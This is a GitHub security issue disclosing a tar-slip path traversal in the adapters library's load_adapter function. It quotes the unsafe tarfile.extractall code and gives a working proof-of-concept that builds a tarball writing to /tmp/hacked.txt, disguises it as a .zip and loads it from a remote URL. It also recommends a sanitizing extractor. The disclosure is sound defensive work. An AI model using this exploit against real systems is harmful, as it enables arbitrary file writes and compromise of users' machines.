Skip to content

Tarslip path traversal via loading adapter from remote URL #828

@Vancir

Description

@Vancir

Description

The adapters library supports loading adapter from remote URLs and, when the file is recognized as a tarball, extracts it with tarfile.extractall(...) directly into a target directory. An attacker-controlled tarball can include entries with absolute paths or ../ sequences to write files outside the extraction directory (tar-slip). Because the loader only checks tarfile.is_tarfile() and not the member paths, a malicious archive fetched from a remote URL will write arbitrary files on the victim host during load_adapter(...). The attacker can even disguise the archive by changing its extension (e.g., .zip) while retaining tar content.

Root cause

The vulnerable code calls tarfile.extractall() without validating member names:

elif tarfile.is_tarfile(output_path):
tar_file = tarfile.open(output_path)
tar_file.extractall(output_path_extracted)
tar_file.close()

tarfile.extractall will extract members with absolute paths or .. components as given. There is no sanitization or canonical-path check to ensure extracted paths remain inside output_path_extracted.

Proof of Concept

  1. Create a malicious tarball which contains a file with an absolute path (or .. path):
import tarfile
from io import BytesIO

def create_malicious_tar(tar_path):
    with tarfile.open(tar_path, "w:gz") as tf:
        # file written to /tmp/hacked.txt on extraction
        info = tarfile.TarInfo(name="/tmp/hacked.txt")
        data = b"You have been hacked!\n"
        info.size = len(data)
        tf.addfile(info, fileobj=BytesIO(data))

        # include normal adapter files so archive looks legitimate
        info = tarfile.TarInfo(name="adapter_config.json")
        data = b'{"some":"config"}\n'
        info.size = len(data)
        tf.addfile(info, fileobj=BytesIO(data))

        info = tarfile.TarInfo(name="pytorch_adapter.bin")
        data = b"FAKEBINARY"
        info.size = len(data)
        tf.addfile(info, fileobj=BytesIO(data))

create_malicious_tar("adapter.tar.gz")
print("Created malicious tar: adapter.tar.gz")
  1. Host the malicious tarball online (attacker can name it adapter.zip to disguise it).
  2. When users are attracted to the adapter archive and use adapters library to load it.
from adapters import AutoAdapterModel
model = AutoAdapterModel.from_pretrained("roberta-base")

url = "https://huggingface.co/XManFromXlab/adapters-load_adapters-tarslip/resolve/main/adapter.zip"
adapter_name = model.load_adapter(url)
  1. When load_adapter downloads and passes the file to the tarfile branch, extractall will write /tmp/hacked.txt (or any crafted path) on the host. The archive can be made to overwrite arbitrary writable files or place webhooks/backdoors in predictable locations.

Notes: tarfile.is_tarfile() will return true for tar content regardless of filename/extension, so using a misleading extension does not prevent the attack.

Impact

This is a high-severity arbitrary file-write vulnerability. A remote attacker who can host an adapter archive (or trick users into loading one) can write files anywhere the process has write permission, create persistent indicators, drop scripts, overwrite configuration or keys, or otherwise escalate to further compromise. The attack is fully automated — merely calling load_adapter(url) on a maliciously crafted archive triggers the write.

Recommended fixes

Replace tarfile.extractall with a safe extractor that sanitizes member paths.
Refer to the implementation in Keras: https://github.com/keras-team/keras/blob/47d1cba8ece3cd0776d95e8007dbd0ad5a8c641a/keras/src/utils/file_utils.py#L56-L116

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions